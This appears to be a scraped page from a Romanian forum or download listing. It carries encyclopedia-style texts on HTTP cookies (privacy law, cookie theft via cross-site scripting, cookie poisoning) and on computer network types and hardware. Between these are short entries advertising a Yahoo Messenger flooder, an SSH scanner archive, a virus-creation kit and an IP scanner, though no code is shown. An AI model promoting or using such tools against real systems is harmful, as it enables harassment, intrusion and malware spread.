pertinente (apropiate de preocupările şi interesele utilizatorului) în anumite pagini. Posibilitatea generării unei aproximări a comportamentului utilizatorilor a fost considerată de unii drept o ameninţare a anonimităţii, mai ales atunci cănd aceasta se face prin urmărirea acţiunilor pe mai multe domenii de Internet, folosind cookie-uri „third party”. din această cauză, folosirea cookie-urilor este reglementată prin lege în unele ţări. Guvernul Statelor Unite ale Americii a elaborat un set strict de reguli în privinţa cookie-urilor în anul 2000, după ce a ieşit la iveală faptul că Direcţia pentru Controlul Drogurilor a Casei Albe folosea cookie-uri pentru a vedea dacă cei care îi accesau site-ul accesau după aceea pagini de web despre folosirea ori producerea drogurilor. În 2002, Daniel Brandt, militant pentru securitatea datelor personale pe web, a descoperit că şi pagina de web a CIA lăsa pe hard-disk-urile utilizatorilor cookie-uri persistente (cu data de expirare 2010). După ce a fost anunţată că îşi încalcă propriile reguli, CIA a răspuns că trimiterea cookie-urilor a fost accidentală, că ele nu au fost folosite efectiv pentru a urmări utilizatorii şi şi-a modificat pagina astfel încât să nu mai folosească cookie-uri. Pe 25 decembrie 2005, Brandt a descoperit că şi NSA lăsa două cookie-uri persistente pe calculatoarele utilizatorilor, din cauza unui update de software. După ce a fost informată de acest lucru, NSA a dezactivat trimiterea de cookie-uri de pe site-ul propriu. O directivă din 2002 a Uniunii Europene în privinţa securităţii informaţiilor de natură personală pe Internet conţine reguli legate de folosirea cookie-urilor. Printre altele, Articolul 5, Alineatul 3 specifică faptul că salvarea datelor (cum ar fi cookie-uri) pe calculatorul unui utilizator poate fi făcută doar dacă: 1) utilizatorului i se spune cum vor fi utilizate aceste date; şi 2) utilizatorului i se dă posibilitatea de a refuza aceste date. Totuşi, acelaşi articol menţionează faptul că salvarea datelor necesare din motive tehnice este exceptată de la această regulă. Această directivă trebuia aplicată încă din octombrie 2003, dar un raport din decembrie 2004 spune (la pagina 38) că această prevedere nu a fost pusă în practică, şi că unele ţări membre nici măcar nu au adoptat-o (Slovacia, Letonia, Grecia, Belgia, şi Luxembourg). Acelaşi raport propune o analiză serioasă a situaţiei din statele membre (ale Uniunii Europene). În afară de problema securităţii datelor personale, mai există câteva motive pentru care folosirea cookie-urilor este criticată: ele nu pot identifica foarte precis utilizatorii, şi pot fi folosite pentru a ataca sistemele IT. În mod normal, cookie-urile sunt transferate între un server (sau mai multe servere din acelaşi domeniu) şi calculatorul utilizatorului. Deoarece cookie-urile pot conţine informaţii confidenţiale (nume de utilizator, parolă etc.), ele nu ar trebui să fie accesibile altor calculatoare. Din păcate, sesiunile HTTP obişnuite sunt vizibile tuturor calculatoarelor din reţea, care pot intercepta pachetele de date. Aceste cookie-uri nu pot conţine deci informaţii confidenţiale. O soluţie posibilă este HTTPS, care foloseşte Transport Layer Security pentru a cripta toate datele schimbate între server şi calculatorul utilizatorului. Cross-site scripting: un cookie care ar trebui să fie schimbat doar între server şi client este trimis unei a treia părţi.Aşa numitul „cross-site scripting” (scripting inter-sit) permite trimiterea unui cookie altor servere, care nu ar trebui în mod normal să-l primească. Browser-ele moderne permit executarea (de către client) a unor fragmente de cod primite de la server; dacă cookie-urile pot fi accesate în timpul execuţiei, ele ar putea fi trimise altor servere decât cele „autorizate”. Aceasta se numeşte „furtul” cookie-ului, iar criptarea nu ajută împotriva acestui gen de atac. Aceasă metodă este de obicei folosită pe sit-uri care permit utilizatorilor să trimită conţinut HTML. Folosind un anumit fragment de cod, un utilizator rău-voitor poate să primească cookie-uri ale altor utilizatori; cu ajutorul lor, el poate apoi să se conecteze şi să se păcălească serverul, care crede că altcineva s-a autentificat. Cookie-urile ar trebui să fie reţinute şi trimise serverului neschimbate; un atacator ar putea însă să le modifice şi apoi să le trimită serverului. Acest proces se numeşte „otrăvirea” cookie-urilor, şi este uneori folosit după „furtul” lor. Dacă, de exemplu, un cookie reţine suma care trebuie plătită pentru cumpărăturile din coşul virtual, schimbarea acestei valori ar putea permite cumpărarea unor bunuri la un preţ mult mai mic. Totuşi, cele mai multe site-uri reţin cu ajutorul cookie-urilor doar un identificator de sesiune: acesta este un număr unic(generat aleator) care identifică sesiunea utilizatorului - el reprezintă de fapt un index într-o tabelă internă a serverului, în care se reţin valorile cu adevărat importante, cum ar fi preţul unor cumpărături, ş.a.m.d.. În acest fel problema cookie-urilor invalide este în principiu eliminată. Fiecare site ar trebui să aibă acces doar la cookie-urile proprii, adică un site de genul rău.net nu ar trebui să poată citi cookie-uri trimise clientului de un alt site bun.net. Totuşi, erori în programarea browser-elor pot duce la încălcarea acestei reguli. Se ajunge la o situaţie similară trimiterii de cookie-uri modificate, dar în acest caz nu este atacat serverul, ci un utilizator de bunăcredinţă care foloseşte un browser vulnerabil. În acest fel, de exemplu, se poate fura acel identificator de sesiune şi atacatorul poate să se „autentifice” în locul utilizatorului de bună credinţă. O metodă foarte puţin precisă de urmărire a utilizatorilor se bazează pe reţinerea adreselor IP ale calculatoarelor care solicită pagini web. Aceasta a fost disponibilă şi folosită încă de la începuturile World Wide Web-ului, pentru că trimiterea paginii către un client presupune cunoaşterea adresei IP a acestuia (sau a proxy-ului, dacă se foloseşte unul). Această adresă poate fi reţinută de către server indiferent dacă cookie-urile sunt sau nu folosite. Totuşi, calculatoarele şi proxy-urile pot fi folosite de mai mulţi utilizatori; de asemenea, acelaşi calculator poate avea adrese IP diferite, de exemplu în cazul unor conexiuni succesive prin dial-up. De aceea, o urmărire fiabilă a unui utilizator este dificilă; o proprietate a protocolului HTTP poate ajuta în acest sens: atunci când un browser cere o pagină din cauză că utilizatorul urmează o legătură, cererea conţine şi adresa paginii pe care se află această legătură. Dacă serverul stochează aceste adrese, el poate avea succesiunea de pagini vizitate de utilizator. Nici această metodă nu este la fel de eficientă ca folosirea cookie-urilor, deoarece mai mulţi utilizatori pot accesa aceeaşi pagină de la acelaşi calculator, NAT router, sau proxy şi apoi să urmeze două legături diferite. În orice caz, în acest fel se pot doar urmări acţiunile utilizatorului, şi nu se pot suplini celelalte moduri de folosire a cookie-urilor. Urmărirea cu ajutorul adresei IP poate fi imposibilă dacă utilizatorul foloseşte unul dintre sistemele de acces anonim la internet, cum ar fi Tor. Acestea fac ca un browser să aibă mai multe adrese IP în cadrul unei singure sesiuni, şi chiar pot face să pară că de la aceeaşi adresă IP vin mai mulţi utilizatori. Termenul vine de la expresia din limba engleză „magic cookie”, care desemnează un pachet de date pe care un program îl primeşte doar pentru a-l trimite înapoi nemodificat. Acest procedeu era deja larg răspândit atunci când, în iunie 1994, Lou Montulli a avut ideea de a-l folosi în cadrul comunicaţiilor web. Pe atunci el era angajat al Netscape Communications, care dezvolta o aplicaţie e-commerce pentru un client, iar cookie-urile au fost folosite pentru a implementa un „coş de cumpărături virtual” Împreună cu John Giannandrea, Montulli a scris descrierea tehnică a cookie-urilor, iar versiunea 0.9 a browser-ului Netscape (lansată în septembrie 1994) accepta cookie-uri. Prima aplicaţie a cookie-urilor a fost pe situl Netscape - se verifica dacă un vizitator intra accesa pentru prima dată situl. Montulli şi Giannandrea au depus o cerere de brevetare a mecanismului (1995), primind brevetul în 1998. Versiunea 2 a Internet Explorer (lansată în 1995) suporta de asemenea cookie-uri. La acel moment, introducerea cookie-urilor nu era foarte cunoscută de publicul larg. Cookie-urile erau acceptate de setările implicite ale browserului, iar utilizatorii nu erau notificaţi de prezenţa lor. Un articol Financial Times, publicat în12 februarie 1996, a atras atenţia asupra cookie-urilor, mai ales din cauza posibilităţii de a sustrage cu ajutorul lor informaţii personale. Primele specificaţii oficiale au fost scrise în februarie 1997, de IETF (documentul RFC 2109). Cookie-urile „third-party” au fost identificate ca fiind o ameninţare la adresa anonimităţii utilizatorilor, astfel încât documnetul recomandă ca ele să nu fie acceptate deloc, sau măcar ca aceasta să fie setarea implicită a browser-ului. Companiile de publicitate deja foloseau cookie-uri, iar recomandarea privind cookie-uri „third-party” nu au fost respectate de Netscape ori de Internet Explorer. RFC 2109 a fost urmat de RFC 2965 în octombrie 2000. Crearea unui cookie Paginile web sunt transmise prin HTTP; browser-ul începe prin a trimite o cerere serverului. De exemplu, pentru a accesa pagina , browser-ul se conectează la serveul şi trimite o cerere de forma: GET /index.html HTTP/1.1 browser → server Serverul răspunde trimiţând pagina cerută, precedată de un pachet de text numit „HTTP header”. Acesta poate conţine linii care cer browser-ului să reţină cookie-uri: HTTP/1.1 200 OK Set-Cookie: name=value Content-type: text/html (content of page) browser ← server Linia Set-cookie este trimisă doar dacă serverul vrea ca browser-ul să reţină un cookie. Mai precis, cookie-ul este name=value. Dacă browser-ul acceptă cookie-uri, toate cererile următoare către acelaşi server vor conţine acel cookie. De exemplu, dacă browser-ul vrea să acceseze va trimite serverului o cerere de forma: GET /spec.html HTTP/1.1 Cookie: name=value Accept: */* browser → server În acest fel serverul ştie că aceasta nu e prima cerere, şi va răspunde trimiţând pagina cerută, eventual împreună cu alte cookie-uri. Valoarea unui cookiepoate fi modificată de server trimiţând linia Set-Cookie: name=newvalue în răspunsul următoarei cereri a browser-ului. În general, linia Set-Cookie nu e creată de serverul propriu-zis, ci de un program CGI. Serverul doar trimite rezultatul geneart de acest program browser-ului. cookie-urile pot fi create şi de scripturi (de exemplu JavaScript) care rulează în cadrul browser-ului. În JavaScript, se foloseşte obiectul document.cookie. De exemplu, instrucţiunea document.cookie = "temperature=20" creează un cookie cu numele temperature şi valoarea 20. :hi: :hi: :hi:
01.10.200917.3KB
aveti grija cum il :dinti: flood yahoo messenger Aveti grija cum il folositi... :dinti:
30.09.200917.3KB
paranormal attack -
30.09.200917.3KB
sau incercati un link pentru arhiva unixcod: ;) arviva scan sshSau incercati un link pentru arhiva UNIXCOD: ;)
25.09.200917.3KB

 
o singura observatie as avea de facut... nu incercati sa faceti upload... nu va merge... :finger: O singura observatie as avea de facut... Nu incercati sa faceti upload... nu va merge... :finger: :finger: :finger:
30.09.200917.3KB
acelasi lucru ca si la postul de mai inainte... nu va speriati si nu rulati virusul creat pe pc-ulAcelasi lucru ca si la postul de mai inainte... nu va speriati si nu rulati virusul creat pe pc-ul vostru. In rest totul e Ok... ;) ... 8.rar.html sau
26.09.200917.3KB
angry ip scanner
30.09.200917.3KB
de computer network) leagă între ele o mai mică sau mai mare de astfel încât un calculatorReţeaua de calculatoare (engleză: computer network) leagă între ele o mulţime mai mică sau mai mare de calculatoare, astfel încât un calculator poate accesa datele, programele şi facilităţile unui alt calculator din aceeaşi reţea. De obicei este nevoie desigur şi de măsuri de restricţie/siguranţă a accesului. Metodele de conectare sunt în continuă dezvoltare şi deja foarte diverse, începând cu tot felul de cabluri metalice şi de fibră optică, cabluri submarine şi terminând cu legături prin unde radio cum ar fi WLAN, Wi-Fi, WiMAX sau Bluetooth, prin raze infraroşii ca de ex. IrDA sau chiar prin intermediul sateliţilor. Există reţele de calculatoare centralizate şi descentralizate. Printre reţelele descentralizate se numără ca exemplu reţelele ARPAnet, Metanet şi Freenet. Topologia (structura) unei reţele rezultă din modul de conectare a elementelor reţelei între ele. Ea determină şi traseul concret pe care circulă informaţia în reţea "de la A la B". Principalele tipuri de topologii pentru reţelele LAN sunt: topologia Bus (înseamnă magistrală) - are o fiabilitate sporită şi o viteză mare de transmisie; topologia Ring (inel) - permite ca toate staţiile conectate să aibă drepturi şi funcţiuni egale; topologia Star (stea) - oferă o viteză mare de comunicaţie, fiind destinată aplicaţiilor în timp real. Reţelele mai mari prezintă o topologie formată dintr-o combinaţie a acestor trei tipuri. Reţelele de calculatoare pot fi clasificate şi după tehnlogia care este folosită pentru a conecta dispozitive individuale din reţea, cum ar fi fibră optică, Ethernet, Wireless LAN (din engleză și înseamnă "fără fir"), HomePNA sau Power line. Metodele de conectare sunt în continuă dezvoltare şi deja foarte diverse, începând cu tot felul de cabluri metalice şi de fibră optică, cabluri submarine, şi terminând cu legături prin radio cum ar fi Wi-Fi sau Bluetooth, prin raze infraroşii (IrDA) sau chiar prin intermediul sateliţilor. Foarte răspândită este metoda Ethernet, termen care se referă la natura fizică a cablului folosit şi la tensiunile electrice ale semnalului. Cel mai răspândit protocol de comunicare în reţelele Ethernet se numeşte CSMA/CD ("Carrier Sense Multiple Access / Collision Detection"). Dacă sunt utilizate undele radio, atunci reţeaua se numeşte reţea fără fir (engleză: wireless). "HomePNA" este un sistem de conectare între ele a calculatoarelor şi aparatelor "inteligente" dintr-o locuinţă, bazat pe fire normale de telefon sau cablu normal de televiziune. În fine, sistemul "Power line communication" (PLC) se bazează pe reţeaua de curent electric, atât cea de înaltă cât şi cea de joasă tensiune, care practic ajung la orice loc din lume. Reţelele de calculatoare mai pot fi clasificate în funcţie de relaţiile funcţionale care există dintre elementele unei reţele, ca de exemplu: Active Networking Architecture, Client-Server Architecture şi Peer-to-peer (workgroup) Architecture. Reţelele de calculatoare se împart după extinderea lor în următoarele tipuri: LAN, MAN, WAN şi, ceva mai nou, PAN. Reţelele relativ mici, de exemplu cu cel mult câteva sute de calculatoare în aceeaşi clădire legate între ele direct, se numesc Local Area Network (LAN). O reţea de tip LAN dar fără fir (prin unde radio) se numeşte WLAN (Wireless LAN). Reţele de mare întindere geografică, de exemplu între 2 oraşe, pe o ţară, un continent sau chiar pe întreaga lume, se numesc Wide Area Network (WAN). Reţelele de tip WAN au fost iniţial foarte costisitoare. Numai companiile mari îşi puteau permite un WAN particular. La ora actuală însă, cele mai multe conexiuni de tip WAN folosesc ca mijloc de comunicaţie Internetul - acesta este universal şi public, deci nu foarte controlabil de către un utilizator, în schimb însă foarte convenabil ca preţ. În sfârşit, PAN înseamnă Personal Area Network - o reţea de foarte mică întindere, de cel mult câţiva metri, constând din aparatele interconectabile din apropierea unei persoane, cum ar fi o imprimantă sau un scanner, sau chiar aparatele pe care o persoană le poartă cu sine, ca de exemplu telefon mobil, player MP3 sau un aparat de navigaţie GPS portabil. Reţele personale (Personal Area Network) Un Personal Area Network (PAN) este o reţea de calculatoare folosită pentru comunicarea între câteva mici calculatoare sau şi aparate multifuncţionale inteligente (smart), apropiate unele de altele. Exemple de dispozitive care sunt folosite în reţeaua de tip PAN sunt imprimantele, aparatele de fax, telefoanele mobile, Personal Digital Assistant (PDA-uri), scanere, aparate de poziţionare şi navigaţie GPS, playere "inteligente" şi altele. Raza de acţiune a reţelelor PAN este aproximativ de la 6-9 metri. Reţelele PAN pot fi conectate cu magistrale USB şi FireWire. Cu ajutorul unor tehnologii ca IrDA (unde infraroşii) şi Bluetooth (unde radio) se pot crea şi reţele de tip Wireless PAN (reţele PAN fără fir). Reţele locale (Local Area Network) O reţea locală într-o bibliotecă publicăArticol principal: LAN Un LAN este o reţea care acoperă o zonă geografică restrânsă, cum ar fi la domiciliu, birou, sau o clădire. Reţelele LAN curente sunt bazate pe tehnologia Ethernet. De exemplu, o bibliotecă va avea o conexiune prin fir sau de tip Wireless LAN pentru a interconecta dispozitive locale (ex.: imprimante, servere) şi pentru a accesa Internetul. Toate calculatoarele din bibliotecă sunt conectate prin fir de reţea de categoria 5, numit UTP CAT5 cable, rulează protocolul IEEE 802.3 printr-un sistem de dispozitive interconectate care eventual se conectează şi la Internet. Cablurile care duc spre server sunt de tipul numit UTP CAT5e enhanced cable; ele suportă protocolul IEEE 802.3 la o viteză de 1 Gbit/s. În exemplul din dreapta reţeaua a fost construită în aşa fel încât calculatoarele angajaţilor bibliotecii din partea dreptă a imaginii pot accesa imprimanta color, înregistrările despre cărţile împrumutate, reţeaua academică şi Internetul. Toţi utilizatorii pot accesa Internetul, şi catalogul bibliotecii. Fiecare grup din reţea poate accesa imprimanta sa locală. În rest, imprimantele nu sunt accesibile din afara grupului respectiv. Toate dispozitivele interconectate trebuie să folosească nivelul 3 network layer din modelul de referinţă OSI, fiindcă în acest exemplu este vorba de mai multe subreţele (cu culori diferite). Subreţelele din interiorul bibliotecii au viteza de numai 10/100 Mbit/s, conexiune Ethernet pînă la utilizatorul final, şi Gigabit Ethernet către router-ul principal, care poate fi numit şi "layer 3 switch", fiindcă el are numai interfaţă Ethernet şi trebuie să "înţeleagă" IP. Mai corect routerele se numesc: "router de acces" (routerul de sus este un router de distribuire care conectează la Internet), şi "router al reţelei academice" - accesat de utilizator. În prezent tehnologia Ethernet sau şi alte tehnologii LAN conforme standardului IEEE 802.3 operează la viteze de peste 10 Mbit/s. Aceasta este rata de transfer teoretică maximă. IEEE are însă proiecte de dezvoltare a standardelor de 40 şi chiar 100 Gbit/s. Reţea academică (Campus Area Network) Articol principal: Campus Area Network Un Campus Area Network (CAN) este o reţea de LAN-uri interconectate, asemănatoare cu cea de tip MAN, dar ea se extinde pe o zonă geografică limitată, de exemplu a unei universităţi. În cazul unei universităţi o reţea CAN poate face legătura între diferite clădiri ale campusului: departamentele academice, biblioteca universitară, căminul studenţesc. CAN este ca extindere în general mai mare decât reţelele locale LAN dar mai mic decât WAN. Reţelele CAN au fost create cu scopul de a facilita studenţilor accesul liber la reţeaua Internet şi la resursele universităţii. Reţea Metropolitană (Metropolitan Area Network) Articol principal: Metropolitan Area Network Reţelele metropolitane (MAN) sunt reţele de mare extindere care de obicei împînzesc oraşe întregi. Aceste reţele folosesc pentru legături cel mai des tehnologii fără fir (wireless) sau fibră optică. - Definiţia IEEE Standardul IEEE 802-2001 descrie MAN ca fiind o reţea metropolitană care este optimizată pentru o întindere geografică mai mare decît reţelele locale LAN, începând de la cartiere rezidenţiale, zone economice şi până la oraşe întregi. Reţelele metropolitane MAN la rândul lor depind de canalele de comunicaţii, şi oferă un transfer moderat pâna la transfer înalt de date. Reţeaua MAN în cele mai frecvente cazuri este proprietatea unui singur operator (companie), dar reţeaua este folosită de către mai multe persoane şi organizaţii. Reţelele MAN mai pot fi deţinute şi conduse ca utilităţi publice. - Implementarea reţelelor metropolitane MAN Unele tehnologii folosite pentru aceste scopuri sunt ATM, FDDI şi SMDS. Dar aceste tehnologii vechi sunt în procesul de substiturire de către reţele Ethernet bazate pe MAN, ex: Metro-Ethernet. Reţelele MAN, la fel ca multe reţele LAN, au fost construite fără fir datorită folosirii microundelor, undelor radio, sau a undelor laser infraroşii. Multe companii dau cu chirie sau închiriază circuitele de la transportatori publici (din cauza costului ridicat al tragerii unui cablu prin oraş). Standardul actual de comunicare al reţelelor metropolitane este "Distribuite Queue Dual Bus", DQDB. Acesta este specificat în standardul IEEE 802.6. Folosind DQDB, reţelele pot avea o întindere de peste 50 km şi pot opera la viteze de la 34 pînă la 155 Mbit/s. Printre primii care au creat reţele MAN au fost companiile Internet peering points, MAE-West, MAE-East şi Sohonet media network. Reţea de arie largă (Wide Area Network) Articol principal: WAN WAN desemnează tipul de reţele de transport de date care acoperă zone geografice mari şi foarte mari (de ex. de la un oraş la altul, de la o ţară la alta, de la un continent la altul), şi folosesc de multe ori facilităţile de transmisiuni de date de la transportori publici (ca de ex. companiile de telefonie). Tehnologiile WAN funcţionează în general la nivelele inferioare ale modelului de referinţă OSI: physical layer, data link layer şi network layer. Reţea globală (Global Area Network) Specificaţiile reţelei globale (GAN) au fost în curs de dezvoltare de către multe grupuri de specialişti. În general, reţeaua globală GAN defineşte un model de asigurare a comunicaţiilor mobile între un număr arbitrar de reţele WLAN, zone de acoperire prin satelit, etc. În proiectul IEEE 802.20, IEEE a stabilit standardele pentru reţeaua terestră GAN, valabile cu începere din iunie 2008. Legătură externă: situl web pentru IEEE 802.20 Internetworking Tehnicile de internetworkig (în sens de inter-networking, şi nu internet-working) conectează între ele două sau mai multe reţele sau segmente de reţea, folosind dispozitive ce operează la nivelul 3 al sistemului de referinţă OSI, cum ar fi un router. Orice interconexiune între reţele publice, private, comerciale, industriale sau guvernamentale poate fi numită "internetworking". În practica actuală, reţelele interconectate folosesc nivelul Internet Protocol (IP). Există trei tipuri de reţele internetwork, în funcţie de cine le administrează şi cine are acces la ele: intranet extranet Internet Reţelele de tip intranet şi extranet pot avea sau nu şi acces la Internet. Dacă ele sunt conectate la Internet, atunci ele trebuie să fie protejate împotriva accesului neautorizat din Internet. Internetul nu este considerat parte constituentă a unui intranet sau extranet. Totuşi el poate servi drept cale de acces la unele porţiuni ale extranet-urilor. Echipamente pentru realizarea reţelelor de calculatoare Placă cu interfaţă de reţea (Network Interface Card, NIC) Articol principal: Placă de reţea O placă de reţea, adapter de reţea sau placă cu interfaţă de reţea este o piesă / un circuit electronic care permite calculatoarelor să se lege la o reţea de calculatoare. Ea asigură accesul fizic la resursele reţelei, care la rândul ei permite utilizatorilor să creeze conexiuni/sesiuni/legături cu alţi utilizatori şi calculatoare. Repeater Un repeter cu tehnologia fără fir Un radio repeaterRepeater-ul (se citeşte aproximativ ri-'pi-tăr) este un dispozitiv electronic care primeşte semnale pe care le retransmite la un nivel mai înalt sau la o putere mai mare, sau de cealaltă parte a unui obstacol, astfel ca semnalul să poată acoperi zone mari fără degradarea calităţii sale. Termenul „repeater” provine din telegrafie unde reprezintă un dispozitiv electromecanic folosit pentru a retransmite semnale telegrafice. Această definiţie a continuat să existe în telefonie precum şi la sistemele de transport de date. În telecomunicaţii definiţia de repeater are urmatoarele sensuri standardizate: un dispozitiv analog care amplifică semnalul de intrare indiferent de natura sa (analoagă sau digitală) un dispozitiv numeric care amplifică, redimensionează sau produce o combinaţie din aceste funcţiii asupra semnalului digital de intrare pentru a fi retransmis. Ethernet Hub Ethernet HubUn hub de reţea (cuvântul englez hub se citeşte aproximativ hab şi înseamnă butucul roţii) este un dispozitiv pentru conectarea altor dispozitive fie prin cablu răsucit (twisted pair), fie fibră optică; legătura permite ca reţeaua să se comporte ca un singur segment. Hub-urile funcţionează la nivelul 1 (fizic) al sistemului de referinţă OSI. Hub-ul este responsabil pentru retransmiterea semnalului (în caz de blocare) spre toate port-urile sale. Deseori hub-urile dispun de connectoare de tip BNC şi/sau AUI pentru a permite conectarea la astfel de segmente de reţele cum ar fi 10BASE2 şi 10BASE5. Apariţia switch-urilor a scos practic de pe piaţă hub-urile, dar ele totuşi sunt întâlnite la conexiuni mai vechi şi în aplicaţii speciale. Hub - detalii tehnice O reţea Ethernet unită prin hub-uri se comportă ca o reţea partajată, fiindcă la orice moment dat un singur dispozitiv transmite, iar fiecare gazdă este responsabilă de detectarea eventualelor coliziuni ale semnalelor, în care caz semnalul trebuie retransmis. În general hub-urile sunt dispozitive de transmitere de date cu randament scăzut. Hub-urile nu duc evidenţa despre traficul care trece prin ele, orice pachet de date care intă prin unul din porturile disponibile este transmis spre toate celelalte porturi. Pentru că fiecare pachet de date este trimis la toate celelalte porturi, are loc aşa numitul proces de coliziune a datelor care frânează fluxul datelor sub viteza nominală. Necesitatea gazdelor (host) pentru detectarea coliziunilor de date limitează numărul de hub-uri şi mărimea reţelei. Pentru reţele de 10 Mbit/s, sunt permise până la 5 segmente (4 hub-uri) între două staţii de lucru finale. Pentru reţele de 100 Mbit/s cifra se reduce la 3 segmente (2 hub-uri) între două terminale finale, şi acest lucru este permis numai dacă media de întârziere a semnalului este la un nivel scăzut. Multe hub-uri detectează probleme tipice, aşa cum ar fi coliziuni excesive pe unele porturi. Reţelele Ethernet bazate pe hub-uri sunt în general mai robuste decât reţele Ethernet pe bază de cablu coaxial, unde un dispozitiv cu malfuncţiuni poate deactiva un segment întreg. Chiar dacă nu este partiţionat automat, depanarea hub-ului este o procedură mai uşoară fiindcă indicatorii de activitate situaţi în dispozitiv pot reflecta sursa problemei; în ultimă instanţă, pentru a localiza sursa unei probleme, dispozitivele pot fi deconectate de la hub pe rând, unul câte unul, mult mai uşor decât la un cablu coaxial. Hub - aplicare Din punct de vedere istoric motivul principal pentru folosirea hub-urilor a fost preţul lor redus, în comparaţiei cu switch-urile. Dar îndată ce preţurile la switch-uri au scăzut considerabil, situaţia s-a schimbat; totuşi în anumite situaţii speciale mai sunt folosite şi azi hub-uri: Un analizator de protocoale conectat la un switch nu poate întotdeauna primi toate pachetele dorite, fiindcă switch-ul separă porturile în diferite segmente. Conectarea analizatorului de protocol la un hub îi permite a vedea tot traficul de pe segment. (Şi un switch se poate configura pentru a permite ca un port să asculte traficul de la un alt port. Aceasta se numeşte port mirroring (oglindirea unui port). Cu toate acestea, această configuraţie este mai costisitoare decât cea cu hub-uri.) Aşa-numitele Computer Clusters necesită ca fiecare membru (computer) să poată primi tot traficul care duce spre clustere. Un hub va face acest lucru pe cale naturală; folosirea unui parametru de punere în aplicare necesită trucuri speciale. În cazul în care utilizatori finali au acces la un parametru pentru a face conexiuni, de exemplu într-o sală de conferinţe, un utilizator fără experienţă, neglijent sau sabotor poate deactiva reţeaua prin legarea împreună a două port-uri, stabilind astfel o buclă. Această situaţie poate fi prevenită prin utilizarea unui hub; în cazul dat bucla va deconecta alţi utilizatori de la hub, dar nu tot restul reţelei. (De asemenea, situaţia poate fi prevenită prin utilizarea unui switch care poate detecta şi soluţiona problemele provenite de la bucle, de exemplu prin punerea în aplicare a protocolului numit spanning tree.) :hi: :hi: :hi:
01.10.200917.3KB
Inainte